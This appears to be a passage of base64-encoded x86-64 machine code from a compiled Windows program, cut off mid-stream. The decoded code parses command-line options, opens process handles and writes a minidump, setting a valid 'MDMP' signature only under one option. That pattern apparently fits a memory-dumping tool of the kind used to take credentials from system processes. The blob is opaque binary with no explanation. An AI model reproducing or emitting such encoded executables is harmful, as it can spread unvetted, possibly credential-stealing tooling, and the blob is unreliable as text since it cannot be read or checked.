/uQEAAABIiwUzhgAA/9BIjRUCnQAASInB6OL+//+5AQAAAEiLBRaGAAD/0EiNFaacAABIicHoxf7//7kBAAAASIsF+YUAAP/QSI0V8JwAAEiJweio/v//uQEAAABIiwXchQAA/9BIjRVsnAAASInB6Iv+//+5AQAAAEiLBb+FAAD/0EiNFdecAABIicHobv7//7kBAAAASIsFooUAAP/QSI0VMpwAAEiJwehR/v//uQEAAABIiwWFhQAA/9BIjRW0nAAASInB6DT+//+5AQAAAEiLBWiFAAD/0EiNFfibAABIicHoF/7//7kBAAAASIsFS4UAAP/QSI0Vq5wAAEiJwej6/f//uQEAAABIiwUuhQAA/9BIjRW+mwAASInB6N39//+5AQAAAEiLBRGFAAD/0EiNFYCcAABIicHowP3//7kBAAAASIsF9IQAAP/QSI0VhJsAAEiJweij/f//uQEAAABIiwXXhAAA/9BIjRV5nAAASInB6Ib9//+5AQAAAEiLBbqEAAD/0EiNFUqbAABIicHoaf3//7kBAAAASIsFnYQAAP/QSI0VVJwAAEiJwehM/f//uQEAAABIiwWAhAAA/9BIjRUQmwAASInB6C/9//+5AQAAAEiLBWOEAAD/0EiNFVGcAABIicHoEv3//7kBAAAASIsFRoQAAP/QSI0V1poAAEiJwej1/P//uQEAAABIiwUphAAA/9BIjRUonAAASInB6Nj8//+5AQAAAEiLBQyEAAD/0EiNFZyaAABIicHou/z//7kBAAAASIsF74MAAP/QSI0VHZwAAEiJweie/P//uQEAAABIiwXSgwAA/9BIjRVimgAASInB6IH8//+5AQAAAEiLBbWDAAD/0EiNFfybAABIicHoZPz//7kBAAAASIsFmIMAAP/QSI0VKJoAAEiJwehH/P//uQEAAABIiwV7gwAA/9BIjRUCnAAASInB6Cr8//+5AQAAAEiLBV6DAAD/0EiNFe6ZAABIicHoDfz//7kBAAAASIsFQYMAAP/QSI0V8JsAAEiJwejw+///uQEAAABIiwUkgwAA/9BIjRW0mQAASInB6NP7//+5AQAAAEiLBQeDAAD/0EiNFQKcAABIicHotvv//7kBAAAASIsF6oIAAP/QSI0VepkAAEiJweiZ+///uQEAAABIiwXNggAA/9BIjRXcmwAASInB6Hz7//+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